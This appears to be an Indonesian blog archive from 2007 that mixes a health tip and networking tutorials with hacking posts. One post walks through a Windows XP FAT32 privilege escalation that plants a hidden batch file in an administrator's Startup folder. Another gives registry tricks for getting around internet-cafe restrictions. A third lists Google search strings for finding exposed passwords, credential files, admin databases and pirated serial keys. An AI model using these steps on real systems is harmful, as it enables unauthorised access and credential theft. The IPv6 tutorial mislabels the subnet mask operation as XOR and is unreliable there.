27 July 2007

Jangan Terlalu Lama di depan Komputer

Hasil riset yang dilakukan National Institute of Occupational Safety and Health Los Angeles menunjukkan, hampir 88 persen dari seluruh pengguna komputer mengalami computer vision syndrome (CVS), yaitu suatu kondisi yang timbul karena kita terlalu lama memfokuskan mata ke layar komputer.

Ciri-ciri sindrom ini adalah pandangan kabur dan tak jarang sampai menyebabkan rasa nyeri di kepala, sakit leher, mata terasa lelah, kering, dan teriritasi serta sulit untuk kembali memfokuskan pandangan.

Jika Anda mengalaminya, sebaiknya mulailah melakukan langkah-langkah penanggulangan.

Seperti dilansir situs NBC5.com, Rabu (14/3/2007) ahli masalah mata (Optometrist) Dr. Jay Schlanger mengatakan, terlalu sering melihat layar komputer akan berdampak buruk pada mata.

“Mata kita tidak dikondisikan untuk terus-menerus melihat layar komputer, delapan jam sehari,” ujarnya.

Schlanger menyarankan, langkah pertama yang harus dilakukan adalah memakai kacamata dengan lensa khusus untuk komputer. “Beberapa perusahaan kini mulai membuat lensa yang bagian atasnya dirancang untuk melihat komputer, dan bagian bawahnya untuk membaca, ini dinamai kacamata kantor,” kata Schlanger.

Pengguna lensa kontak juga punya solusi, yaitu dengan mengganti lensa kontak generasi baru yang terbuat dari silikon hydrogel. “Silikon jenis ini memungkinkan daya transmisi oksigen yang lebih tinggi dibanding jenis lain,” ungkap Schlanger.

Langkah lain yang bisa dilakukan adalah dengan mengalihkan pandangan dari layar komputer. Minumlah banyak air putih selama di kantor. Ini membantu tubuh tidak kekurangan cairan, sehingga ada cukup persediaan air yang memudahkan tubuh menghasilkan air mata, dan menjaga agar mata tidak kering.

Sudut pandangan ke komputer juga harus pas, bagian atas layar komputer harus sejajar dengan mata. Sesuaikan tingkat terang/gelap layar, dan pastikan tidak ada pantulan yang menyilaukan dari sumber cahaya lain.

Dari Berbagai Sumber

11 June 2007

Exploitasi Windows XP (Fat32)

Metode eksploitasi yang akan dijelaskan hanya bekerja pada Window XP yang
menggunakan sistim Fat32. Windows XP yang file systemnya Fat32 membolehkan
user biasa mengakses direktory home dari admin yang biasanya terletak
pada:

C:\Documents and Settings\Administrator\

Sedangkan di Windows XP yang file systemnya sudah NTFS, user biasa tidak
akan bisa mengakses direktory home dari admin. Kalau dipaksakan maka
dipastikan dengan sukses akan keluar pesan

Access Denied

Proses eksploitasi dapat dilakukan dengan cara...

MELIHAT USER YANG TERDAFTAR

C:\DOCUME~1\mRt>net user

User accounts for \\CyberCafe

------------------------------------------------------------
Administrator Guest mRt
HelpAssistant SUPPORT_388945a0 Win_Xp
The command completed successfully.

MELIHAT HAK AKSES USER

C:\DOCUME~1\mRt>net user Win_Xp
User name Win_Xp
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/9/2005 3:38 AM
Password expires Never
Password changeable 1/9/2005 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/26/2005 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators <-- ketahuan aksesnya Global Group memberships *None The command completed successfully. Setelah mengetahui siapa user yang mempunyai akses admin, sekaranglah saatnya untuk beraksi. Pertama-tama buat dulu script batch yang akan mengangkat user kita menjadi admin. <++ batchfile ++>

net localgoup Administrators mRt /add

<-- batchfile -->

setelah kita buat script batch tersebut, kemudian simpan di
direktory:

C:\Documents and Settings\Win_Xp\Start Menu\Programs\Startup

Agar kelihatan lebih rapi sebaiknya script batch tersebut dibuat
hidden. Lalu mengunggu user yang mempunyai akses admin tersebut
login, setelah user yang mempunyai akses admin tersebut login
maka akses user yang ada pada kita bakalan hilang digantikan
dengan akses admin.

Penutup
Disayangkan, cara ini dapat mengundang kecurigaan admin, karena ketika
sang admin telah melakukan proses login maka dia akan melihat sekelebat
tampilan DOS Prompt yang tiba-tiba muncul di desktopnya.

Semoga artikel ini dapat "sedikit" menambah pengetahuan kita semua.
referensi :
- http://www.google.com/
- The Complete Windows Trojan Paper by Dancho Danchev


by:martin_csk@yahoo.com

04 June 2007

TIPS && TRICK DI WARNET

*Pernahkah suatu saat anda berkunjung ke "cyber cafe" a.k.a warnet
dan anda merasa kerepotan dengan berbagai 'restrict' yang diberlakukan
+disini aku sedikit coba mengulas, apa saja yang dapat anda lakukan
jika anda berada di posisi pemakai dan yang harus anda perhatikan jika
anda berada pada posisi penyedia layanan :PO .

-=PErlindungan Wind*ws explorer
pelarangan penggunaan key wind*ws dengan cara ekstrim banget ( yaitu
dengan mengeksekusi mati tombol tersebut :) ) sehingga anda tidak dapat
melakukan , windows key + e (to open the explorer), ..
hal yang bisa anda lakukan adalah:
-klik-kanan start menu dan pilih explore

-=pelarangan penggunaan win# explorer anda.

-pilih mydocuments, yang akan menjadi jalan pembuka anda ke explorer
jika anda kerepotan karena kehilangan tree view di kiri anda, jangan
khawatir apalagi panik dan berteriak-teriak memanggil operator :P, yang
perlu dan bisa anda lakukan adalah,
arahkan kursor keatas, pada bar atas, pilih view > kemudian Explorer bar
> folders :: apakah sudah nampak seperti explorer bagi anda.

-Kesalahan yang dilakukan oleh penyedia layanan ataupun kelemahan OS tsb
adalah dengan memanfaatkan kelebihan/ kel**han Micr*s**k Internet
Explorer anda , yaitu bukalah browser anda, ketikkan c:\ atau a:\ atau
apapun juga,
* dan saya pernah mengalami kejadian ini, qkqkqkqkqkqk
-pada win* explorer , anda tidak bisa mengakses drive a:\ tanpa password
dari admin a.k.a yang punya (they used another third parties program)
tetapi dengan menggunakan IE anda dapat mengaksesnya tanpa kesulitan :)
atau bahkan tanpa ketahuan :P

ps: ternyata win# explorer dan Mic# IE gak kompak :P

-=apabila windows yang anda pakai tak bisa menampilkan run aku sering pakai run buat mempercepat menggunakan "notepad", "mspaint",
dan tentu saja "command" :P >

yang kudu dilakukan;

-buka teks editor a.k.a notepad or wordpad, lalu ketik dan pastekan ini.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
"NoRun"=dword:00000000

-save sebagai echo.reg [or whatever asal ekstensionnya REG]
-double klik file tersebut , jawab dengan mengklik - yes
-restart pc, cukup dengan Ctrl+Alt+Del, jika keluar popup.pilih eXplorer
terus di endtask aja, wait bentar.. kalo ada popup lagi enDtask lagi :P

=+cara termudah kalo regedit bisa dipakai kamu bisa memasukkannya dari
regedit, coba ketik C:\WINDOWS\regedit.exe di barnya eXplorer, ataupun
pada URL BARnya Internet EXplorer anda :P maka akan keluar window baru
yang berisi regedit :P :),

masuk ke
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer
buat dword baru dan masukkan NoRun dengan dword 00000000

-=kalo regeditnya juga diilangin,nangis aja deh ;p hehhehe, gak kok, kan
kamu bisa buat file diatas itu..
kalo gak munculin dulu regeditnya, caranya :

cara 1-4 sama kayak diatas (males ngetikinnya):
tapi yang dipaste beda ;) ;P


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
"DisableRegistryTools"=dword:00000001

[oke]==
kalo kamu mau repot tinggal buat aja programnya, yang cuma ngejalanin
sintax tersebut diatas dsb.. banyak dah toolsnya..!



EOF.

"segini dulu deh, semoga bermanfaat!, jangan dibuat yang aneh-aneh kalo
gak mau jadi aneh :P"


REFERENSI a.k.a bacaan :
diinspirasi dari berbagai sumber yang dah lawas <*maaf, terlupakan> ,
thanks tuk penulis sebelumnya && percobaan pribadi


*greetz to:
[echostaff a.k.a moby, the_day, comex ,z3r0byt3 ,netrat] && puji_tiwili*
anak anak newbie_hacker, pak onno, pak linus, pak eric s. Raymond,
pak RM. stallman, $peci@l temen2 seperjuangan

kirimkan kritik && saran ke y3dips[at]echo.or.id

Hackers Fact and Fiction

Sudah tidak jarang aku temui atau kita temui bahwa dibeberapa (hampir semua)
media (baik elektronik dan surat kabar) menampilkan berita atau bahkan menjadi
headline dimedia tersebut yang bertuliskan "Seorang Hacker menjebol ****** dan
mencuri ribuan kartu kredit", atau "Hacker situs "211611" akhirnya tertangkap",
atau bahkan hanya "Hacker mengganti tampilan situs ANU dan merubah beberapa
artikel penting".

Terus terang saja cita citaku adalah menjadi hacker (just like u, i just want
to be a hacker)dan hampir di setiap permulaan "seminar" atau "workshop" yang
kebetulan akulah pembawa materinya, maka selalu aku menyebutkannya, dan
setiap kali itu pula berpasang-pasang mata berdelik curiga, menuduh, dan
tidak percaya (sambil geleng kepala) bahwa ada "orang bodoh" lainnya yang
mau-maunya bercita-cita menjadi hacker, atau bahkan berfikir dalam hati "sial,
pembicara kali ini pengen jadi kriminal, salah pilih seminar nih".

Wajar saja, didikan media baik dalam negeri dan luar negeri memang membentuk
pola fikir seperti itu, (ingat bagaimana kita sama-sama dengan pasti mengikuti
satu "script (kalimat)" dari suatu iklan, baik secara sadar atau tidak).
Tidak hanya satu kali film-film keluaran "hollywood" dan lain sebagainya
[MAAF] "memperkosa" pengertian hacker demi keuntungan pribadi/pihak tertentu.

Disini aku mengutip Pengantar yang di tulis oleh Jeff Moss pada sebuah buku
yang berjudul "Stealing the Network: How to Own a Continent" terbitan Syngress,
dan disitu Jeff Moss mengatakan bahwa :

" The term hacker has been co-opted through media hype and
marketing campaigns to mean something evil. It was a convenient
term already in use, and so instead of simply saying someone
was a criminal hacker, the media just called him a hacker.
You would not describe a criminal auto mechanic as simply a
mechanic, and you shouldn't do the same with a hacker, either."
-- 3rd paragraph

Nah, dari kalimat diatas jelas bahwa Jeff Moss ingin mengatakan bahwa
Gembar-gembor media dan keuntungan penjualanlah yang membuat penyalahgunaan
arti hacker, secara ekstrim aku ingin mengambil contoh seorang Guru
yang telah melakukan suatu tindak kriminal pembunuhan, apakah aku dan kita
dengan serta merta menyebut guru adalah pembunuh dan semua guru-guru
lainnya adalah kriminal ? aku rasa tidak, dan yang menjadi pertanyaan
adalah kenapa hal itu tidak berlaku pada hacker, apakah seorang "criminal hacker"
akan di sebut hacker dan hacker adalah seorang kriminal?

Masih tetap di buku yang sama dan di chapter yang sama (pengantar) Jeff Moss
mengungkap bahwa hacker bukan hanya masalah kemampuan tetapi juga "moral"

"While you may have the skills, if you lack the mental fortitude,
you will never reach the top. This is what separates the truly
elite hackers from the wannabe hackers." -- 1st paragraph

Apabila moral tidak terpenuhi maka individu tersebut tidak akan pernah dapat
meraih puncak, dan hal inilah yang sesungguhnya menjadikan pembeda antara
"hacker elit" dan "hacker pemula".

Apabila kamu semakin frustasi dengan pengertian hacker, Jeff Moss menyebutkan
bahwa hacker adalah seseorang yang secara teknis memiliki gabungan kemampuan
sebagai seorang programmer dan administrator sistem komputer yang saling melengkapi.

" Originally, it was a compliment applied to technically adept
computer programmers and system administrators." -- 2nd pragraph

Kevin Mitnick dalam kalimat pengantar di bukunya yang berjudul Art Of Deception,
juga menyebutkan bahwa hacker yang merusak (berbuat kriminal?) disebut
juga "crackers" atau "vandals" dan mereka yang hanya mendownload tools
untuk masuk ke sistem komputer hanyalah "Script Kiddies".

" Some hackers destroy people's files or entire hard drives;
they're called crackers or vandals. Some novice hackers don't
bother learning the technology, but simply download hacker tools
to break into computer systems; they're called script kiddies. "
- Preface
y3dips
---// Referensi

1. Jeff Moss, (Dark tangent, BlackHat.inc)
Stealing the Network: How to Own a Continent, Syngress Publishing (c) 2004

2. Kevin Mitnick, (Condor, )
THE ART OF DECEPTION : "Controlling the Human Element of Security"
Pengenalan Port


Mungkin kita sudah gak asing ama istilah port number, tapi buat yang
belum tahu port adalah sebuah lubang yang memungkinkan suatu (data)
untuk memasukinya. Komputer bisa dikatakan memiliki 2 macam port,
yaitu port fisik dan port perangkat lunak. Port fisik adalah slot yg
ada pada bagian belakang CPU, sedangkan port perangkat lunak adalah port
yg dipakai oleh software saat melakukan koneksi dengan komputer lain.
Nah yg berhubungan secara langsung dengan kegiatan kita saat bermain dgn
internet adalah
port perangkat lunak. Port perangkat lunak ini dapat kita bedakan
menjadi 3, yaitu:

a)well known port
port jenis ini memiliki range dari 0-1023,semula sih hanya memiliki
range dari 0-255 tapi oleh IANA(Internet Assigned Number Authority)
dilebarkan menjadi range tadi yg disebutkan diawal. Pada kebanyakan
sistem port pada range ini hanya dapat dipakai oleh root,atau oleh
program yang dijalankan oleh user. Karena range-nya dari 0-1023 maka
port2 terkenal seperti ftp(21),ssh(22),telnet(23),http(80) termasuk
dalam jenis ini.

b)Registered Ports
memiliki range dari 1024-49151, port jenis ini tidak ditujukan untuk
service tertentu dari suatu server. Lalu apa gunanya dong?? hehehe,
port pada range ini biasanya digunakan oleh Networking utlites seperti
Browser, Email Client, FTP software untuk berkomunikasi dengan remote
server. Biasanya Networking utlites akan membuka secara acak port pada
range ini untuk terhubung dgn remote server. Port number pada range
inilah yang membuat kita dapat melakukan surfing di internet,melakukan
pengecekan e-mail,dll. Jadi sangat berguna kan? hehehe Port ini akan
membuka sementara ketika kita sedang menjalankan sebuah aplikasi
sehingga apabila kita menutup aplikasi tersebut maka secara otomatis
port ini pun akan tertutup dgn sendirinya(ingat Networking utlites
membukanya secara acak)

c)The Dynamic/Private Ports
memiliki range dari 49152-65535, biasanya sih digunakan oleh sebagian
besar trojan(waaaaaaaa..), tapi ada juga sih program yang memkai port
ini terutama program yang memerlukan range port number yang besar,
seperti pada Sun yang menjalankan RPC pada port 32768.

Untuk lebih jelasnya mari kita lihat :

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED
TCP juve:1036 juve.box.sk:ftp-data TIME_WAIT
TCP juve:1043 banners.egroups.com:80 FIN_WAIT_2
TCP juve:1045 mail.kalteng.net.in:pop3 TIME_WAIT
TCP juve:1052 banners.boxnetwork.net:80 ESTABLISHED
TCP juve:1053 mail.kalteng.net.in:pop3 TIME_WAIT
UDP juve:1025 *:*
UDP juve:nbdatagram *:*

Mari kita ambil satu baris dari contoh diatas :

Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED

data diatas menunjukan pada kita bahwa:
*Protocol: TCP (ini adalah Transmission Control Protocol atau TCP, User
Datagram
Protocol atau UDP, IP atau Internet Protocol)
*Nama lokal sistem: juve (ini adalah nama dari lokal sistem yang kita
setting pada windows setup)
*Lokal port yang terbuka dan digunakan pada saat melakukan koneksi ini
adalah: 1031
*Remote Sistem: juve.box.sk (ini adalah non-numerical form dari sistem
dimana kita terkoneksi)
*Remote Port: ftp (ini adalah port number dari remote sistem
kalteng.box.sk dimana kita terkoneksi)
*Keterangan koneksi: ESTABLISHED

Itu dulu yah..ntar kapan2 kita sambung lagi,mudah2an ada gunanya buat
kalian. Keep Learning!!!

Penulis :juventini
Email:juventinI@kalteng.net

Pengenalan Internet Protokol versi 6 (IPv6)

Pengenalan Internet Protokol versi 6 (IPv6)


Assalamualaikum wr.wb

Awalnya artikel ini saya tulis tentang implementasi IPv6 pada sistem operasi linux,
tetapi setelah saya tulis kok kepanjangan kalo hanya dijadikan satu primbon oleh
karena itu saya memutuskan menuliskannya kedalam 2 primbon (yaitu pengenalan IPv6 primbon #1,
dan Implementasi IPv6 pada sistem operasi linux primbon #2).


Dalam jaringan komputer dikenal adanya suatu protokol yang mengatur bagaimana
suatu node berkomunikasi dengan node lainnya didalam jaringan, protokol tersebut
berfungsi sebagai bahasa agar satu komputer dapat berkomunikasi satu dengan yang lainnya.
protokol yang merupakan standar de facto dalam jaringan internet yaitu protokol TCP/IP,
sehingga dengan adanya TCP/IP komputer yang dengan berbagai jenis hardware dan berbagai
jenis sistem operasi (linux,Windows X, X BSD, de el el) tetap dapat berkomunikasi.

Internet Protocol (IP) merupakan inti dari protokol TCP/IP, seluruh data yang berasal dari
layer-layer diatasnya harus diolah oleh protokol ini agar sampai ketujuan.versi IP yang saat
ini telah dipakai secara meluas di internet adalah Internet Protocol versi 4 (IPv4).

perkembangan internet yang sangat pesat sekarang ini menyebabkan alokasi alamat (IP addres)
IPv4 semakin berkurang, hal ini menyebabkan harga IP address legal sangat mahal
(kecuali maok!!!heu...heu...).Untuk mengatasi kekurangan alokasi IP address maka IETF
mendesain suatu IP baru yang disebut Internet Protocol versi 6 (IPv6).

pada IPv6, panjang alamat terdiri dari 128 bit sedangkan IPv4 hanya 32 bit. sehingga IPv6
mampu menyediakan alamat sebanyak 2^128 [2 pangkat 128] atau 3X10^38 alamat, sedangkan IPv4
hanya mampu menyediakan alamat sebanyak 2^32 atau 4,5X10^10 alamat.

oke, tadi cuma intro aja! sekarang kita lanjutkan ke yang lebih dalam lagi.
kemon baybeh!!!!!

sekarang saya akan menjelaskan perbedaan yang lainnya antara IPv4 dengan IPv6.

A.Struktur pengalamatan

#IPv4

pengalamatan IPv4 menggunakan 32 bit yang setiap bit dipisahkan dengan notasi titik.
notasi pengalamatan IPv4 adalah sebagai berikut:

XXXXXXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

dimana setiap simbol X digantikan dengan kombinasi bit 0 dan 1.misalnya:

10000010.11001000.01000000.00000001 (dalam angka biner)

cara penulisan lain agar mudah diinget adalah dengan bentuk 4 desimal yang dipisahkan
dengan titik. misal untuk alamat dengan kombinasi biner seperti diatas dapat dituliskan
sebagai berikut:

130.200.127.254

penulis sudah menganggap teman-teman semua dah bisa cara untuk mengkonversi dari bilangan
biner ke desimal:). cos' kalo harus dijelasakan lagi nanti tambah ruwet nih artikel:p
oke sekarang berlanjut ke struktur pengalamatan IPv6!


#IPv6

Tidak seperti pada IPv4 yang menggunakan notasi alamat sejumlah 32 bit, IPv6 menggunakan
128 bit. dah tau khan kenapa jadi 128 bit? yup biar alokasinya bisa lebih banyak.
oke sekarang kita liat notasi alamat IPv6 adalah sebagai berikut:

X:X:X:X:X:X:X:X

kalo dalam bentuk biner ditulis sebagai berikut:

1111111001111000:0010001101000100:1011111001000001:1011110011011010:
0100000101000101:0000000000000000:0000000000000000:0011101000000000

(dua blok diatas sebenarnya nyambung tapi agar tidak memakan tempat maka ditulis kebawah)
itu notasi alamat IPv6 kalo dalam bentuk biner hal ini sengaja saya tulis bukan untuk membuat
pusing yang baca tetapi untuk menunjukkan betapa panjangnya alamat IPv6.
silahkan bandingkan dengan panjangnya IPv4.

nah! agar lebih mudah diinget setiap simbol X digantikan dengan kombinasi 4 bilangan
heksadesimal dipisahkan dengan simbol titik dua [:]. untuk contoh diatas dapat ditulis sbb:

FE78:2344:BE43:BCDA:4145:0:0:3A

lebih enak diliatnya khan?nah sistem pengalamatan IPv6 dapat disederhanakan jika terdapat
berturut-turut beberapa angka "0". contohnya untuk notasi seperti diatas dapat ditulis:

FE78:2344:BE43:BCDA:4145:0:0:3A -------> FE78:2344:BE43:BCDA:4145::3A

contoh lagi:

8088:0:0:0:0:0:4508:4545 -------->8088::4508:4545


B.Sistem pengalamatan

#IPv4

Sistem pengalamatan IPv4 dibagi menjadi 5 kelas, berdasarkan jumlah host yang dapat dialokasikan
yaitu:

Kelas A : range 1-126
Kelas B : range 128-191
kelas C : range 192-223
kelas D : range 224-247
kelas E : range 248-255

tapi yang lazim dipake hanya kelas A,B dan C sedangkan kelas D dipakai untuk keperluan alamat
multicasting dan kelas E dipake untuk keperluan eksperimental.

selain itu pada IPv4 dikenal istilah subnet mask yaitu angka biner 32 bit yang digunakan untuk
membedakan network ID dan host ID, menunjukkan letak suatu host berada dalam satu jaringan
atau lain jaringan.contohnya kaya gini:

IP address: 164.10.2.1 dan 164.10.4.1 adalah berbeda jaringan jika menggunakan netmask
255.255.254.0, tetapi akan jika netmasknya diganti menjadi 255.255.240.0 maka kedua
IP address diatas adalah berbeda jaringan. paham belom? kalo belom paham gini caranya:


164.10.2.1-------> 10100100.00001010.00000010.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00000010.00000000-->164.10.2.0
dan
164.10.4.1-------> 10100100.00001010.00001000.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00001000.00000000-->164.10.4.0


operasi XOR caranya seperti pertambahan waktu SD, cuman lebih mudah, gampangnya gini kalo
angka "1" jumlahnya genap hasilnya "1" kalo jumlah "1" ganjil hasilnya "0" (1+1=1, 1+0=0)
(heu...heu...).

terlihat hasil operasi XOR dua IP address dengan netmask yang sama hasilnya beda berarti
kedua IP address tersebut berbeda jaringan. untuk contoh berikutnya yang menggunakan
netmask 255.255.240.0 silahkan coba sendiri.

#IPv6

pada IPv6 tidak dikenal istilah pengkelasan, hanya IPv6 menyediakan 3 jenis pengalamatan
yaitu: Unicast, Anycast dan Multicast. alamat unicast yaitu alamat yang menunjuk pada sebuah
alamat antarmuka atau host, digunakan untuk komunikasi satu lawan satu. pada alamat unicast
dibagi 3 jenis lagi yaitu: alamat link local, alamat site local dan alamat global.
alamat link local adalah alamat yang digunakan di dalam satu link yaitu jaringan local yang
saling tersambung dalam satu level. sedangkan alamat Site local setara dengan alamat privat,
yang dipakai terbatas di dalam satu site sehingga terbatas penggunaannya hanya didalam satu
site sehingga tidak dapat digunakan untuk mengirimkan alamat diluar site ini.
alamat global adalah alamat yang dipakai misalnya untuk Internet Service Provider.

alamat anycast adalah alamat yang menunjukkan beberapa interface (biasanya node yang berbeda).
paket yang dikirimkan ke alamat ini akan dikirimkan ke salahsatu alamat antarmuka yang paling
dekat dengan router. alamat anycast tidak mempunyai alokasi khusus, cos' jika beberapa
node/interface diberikan prefix yang sama maka alamat tersebut sudah merupakan alamat anycast.

alamat multicast adalah alamat yang menunjukkan beberapa interface (biasanya untuk node yang
berbeda). Paket yang dikirimkan ke alamat ini maka akan dikirimkan ke semua interface yang
ditunjukkan oleh alamat ini. alamat multicast ini didesain untuk menggantikan alamat broadcast
pada IPv4 yang banyak mengkonsumsi bandwidth.

Tabel alokasi alamat IPv6
__________________________________________________________________
|alokasi | binary prefix |contoh (16 bit pertama |
|_______________|__________________________|_______________________|
|Global unicast |001 | 2XXX ato 3XXX |
|link local |1111 1110 10 | FE8X - FEBx |
|site local |1111 1110 11 | FECx - FEFx |
|Multicast |1111 1111 | FFxx |
|_______________|__________________________|_______________________|

selain alamat diatas tadi ada juga jenis pengalamatan lainnya diantaranya:

#IPv4-compatible IPv6 address biasanya alamat ini digunakan untuk mekanisme transisi Tunelling
format alamatnya kaya gini:

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| 0000 | IPv4 address |
+-------------------+------+---------------------+

contohnya:
= 0:0:0:0:0:0:192.168.30.1
= ::192.168.30.1
= ::C0A8:1E01
jadi 0:0:0:0:0:0:192.168.30.1=::c0AB:1E01 kok bisa dapat dari mane? gini caranya:
buat dulu alamat 0:0:0:0:0:0:192.168.30.1 jadi biner
::11000000.10101000.00011110.00000001 kemudian kelompokkan menjadi masing 16 bit
::[1100.0000.1010.1000]:[0001.1110.0000.0001] diubah ke heksa desimal--->::C0A8:1E01
tanda "." (titik) didalam kurung untuk mempermudah konversi dari biner ke heksadesimal.
sudah pahamkan? masih belum juga silahkan ulangi lagi dengan perlahan:p

#IPv4-mapped IPv6 address biasanya digunakan untuk mekanisme transisi ISATAP.

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| FFFF | IPv4 address |
+-------------------+------+---------------------+

contohnya: =::FFFF:192.168.1.2

#IPv6 over ethernet digunakan untuk stateless autoconfiguration (pemberian alamat IPv6
secara otomatis tanpa memerlukan server yang memberi alokasi IP address, mirip DHCP
cuman tanpa server).
contoh:
00:90:27:17:FC:0F
/\
/ \
FF FE
maka alamatnya menjadi 00:90:27:FF:FE:17:FC:0F kemudian diblok pertama bit ketujuh diinvers
00:90:27:17:FC:0F
|
|
\|/
000000[0]0 bit yang dikurungi diinvers dari 0--->1
maka sekarang menjadi 02:90:27:FF:FE:17:FC:0F alamat tersebut adalah alamat IPv6 over ethernet.

oke mungkin segitu dulu tulisan dari saya, sebagai dasar teori untuk IPv6 (ceile!!!!),
sebenarnya masih banyak yang ingin saya tulis cuman nanti terlalu panjang nih artikel takut
ga ada yang baca. (heu.....heu...)

semoga tetap dalam semangat untuk berbagi!!!!!
Wassalam


kritik&saran silahkan kirim ke pan6eran_biru[at]yahoo.com




Referensi:-TCP/IP standard,desain dan Implementasi, Onno W.purbo dkk
-Teori dan Implementasi IPv6 Protokol Internet Masa depan, Riza Taufan
-Interkoneksi IPv6 dengan menggunakan DSTM, Dody Setiawan
-Implementasi dan Analisa Teredo untuk interkoneksi jaringan IPv6/IPv4 dengan jaringan IPv6 yang melalui IPv4 NAT (Network Address Translation), Wahidi Somad
-Introduction & Deployment IPv6 Tutorial,Che Rohani Ishak dkk

31 May 2007

Mengamankan Jaringan Komputer

Mengamankan jaringan komputer membutuhkan tiga tingkatan proses. Untuk
mengamankan jaringan komputer kita harus dapat melakukan pemetaan terhadap
ancaman yang mungkin terjadi.

Prevention (pencegahan)

Kebanyakan dari ancaman akan dapat ditepis dengan mudah, walaupun
keadaan yang benar-benar 100% aman belum tentu dapat dicapai. Akses yang
tidak diinginkan kedalam jaringan komputer dapat dicegah dengan memilih dan
melakukan konfigurasi layanan (services) yang berjalan dengan hati-hati.

Observation (observasi)

Ketika sebuah jaringan komputer sedang berjalan, dan sebuah akses
yang tidak diinginkan dicegah, maka proses perawatan dilakukan. Perawatan
jaringan komputer harus termasuk melihat isi log yang tidak normal yang dapat
merujuk ke masalah keamanan yang tidak terpantau. System IDS dapat digunakan
sebagai bagian dari proses observasi tetapi menggunakan IDS seharusnya tidak
merujuk kepada ketidak-pedulian pada informasi log yang disediakan.

Response (respon)

Bila sesuatu yang tidak diinginkan terjadi dan keamanan suatu system
telah berhasil disusupi, maka personil perawatan harus segera mengambil
tindakan. Tergantung pada proses produktifitas dan masalah yang menyangkut
dengan keamanan maka tindakan yang tepat harus segera dilaksanakan. Bila
sebuah proses sangat vital pengaruhnya kepada fungsi system dan apabila
di-shutdown akan menyebabkan lebih banyak kerugian daripada membiarkan
system yang telah berhasil disusupi tetap dibiarkan berjalan, maka harus
dipertimbangkan untuk direncakan perawatan pada saat yang tepat [1]. Ini
merupakan masalah yang sulit dikarenakan tidak seorangpun akan segera tahu
apa yang menjadi celah begitu system telah berhasil disusupi dari luar.

Victims/statistic (korban/statistik)

Keamanan jaringan komputer meliputi beberapa hal yang berbeda yang
mempengaruhi keamanan secara keseluruhan. Serangan keamanan jaringan komputer
dan penggunaan yang salah dan sebegai contoh adalah virus, serangan dari
dalam jaringan komputer itu sendiri, pencurian perangkat keras (hardware),
penetrasi kedalam system, serangan "Denial of Service" (DoS), sabotase,
serangan "wireless" terhadap jaringan komputer, penggantian halaman depan
situs (website defacement), dan penggunaan yang salah terhadap aplikasi web.
Statistik menunjukkan jumlah penyusupan didalam area ini sudah cukup banyak
berkurang dari tahun 2003 [24], tipe variasi dari serangan, bagaimanapun juga,
menyebabkan hampir setiap orang adalah sasaran yang menarik.

echo|zine, volume 4, issue 13

30 May 2007

Google Hacking

metode 1
coba masukkan keyword berikut pada gogole:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurlasslist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

metode 2
masukkan string berikut pada google untuk mencari file mp3

intitle:index.of mp3

kamu tinggal masukin aja nama lagu/penyayi/artis/judul:
example : intitle:index.of mp3 jackson

kamu juga bisa mengubah untuk mencari file2 lain misalnya yg berektensi zip..
example : intitle:index.of *.zip namafile atau example : intitle:index.of zip namafile

metode 3
masukkan string berikut pada google search:
inurl:microsoft filetype:iso
dan terserah dengan apa yang ingin kamu cari, ex. microsoft ,adobe, iso , zip etc…
"# -FrontPage-" inurl:service.pwd
ini buat ngedapetin frontpage password !!

"sets mode: +k"
yang ini buat ngedapetin password channel IRC.

allinurl: admin mdb
buat ngedapetin admin database!

allinurl:auth_user_file.txt
password n user yang disimpang dalam bentuk txt

intitle:"Index of" config.php
user password database..

eggdrop filetype:user user
konfigurasi eggdrop.

intitle:index.of.etc
untuk mengakses etc directory..

nyari serian number windows xp
masukkan string berikut pada google bar - "Windows XP Professional" 94FBR
94FBR adalah kode ...
atau untuk mendapatkan serial winzip 8.1 - "Winzip 8.1" 94FBR

Mengejar "Hacker" Itu Mudah

Mengejar "Hacker" Itu Mudah

JUDUL ini mungkin terlalu hiperbolis. Tapi harus diakui, isu mengenai hacker di Internet sering kali ditulis dengan gaya yang terlalu mistis, malah mendekati klenik. Keberadaan hacker di Internet dilihat media massa sebagai seorang tokoh ala Robin Hood, bebas menggondol harta penguasa tanpa bisa dikejar oleh penegak hukum, serta dapat dibuktikan perbuatannya. Apakah memang demikian adanya?

Istilah hacker biasa dipakai untuk menyebut seseorang yang memiliki keahlian khusus di bidang komputer. Seorang hacker mampu berpikir dan bekerja dengan efektif dan efisien, dan sering kali menyelesaikan permasalahan dihadapi dengan metode yang out of the box, di luar pemikiran yang biasa digunakan orang.

Lama-kelamaan arti dari istilah ini menyempit menjadi seseorang yang memiliki kemampuan lebih di bidang keamanan jaringan komputer, dan memanfaatkan kemampuannya untuk mendapatkan akses secara ilegal ke dalam sistem komputer orang lain. Jika tindakan yang dilakukan bersifat destruktif, merugikan pihak lain, istilah yang lebih tepat untuk menyebut orang seperti itu adalah cracker.

Komunitas hacker di Indonesia kebanyakan terdiri dari siswa dan mahasiswa yang memiliki ketertarikan di bidang keamanan jaringan komputer. Kelompok ini memiliki banyak waktu luang untuk mencari informasi mengenai bagaimana cara-cara yang bisa dipakai untuk memanfaatkan kelemahan yang ada pada jaringan komputer milik orang lain.

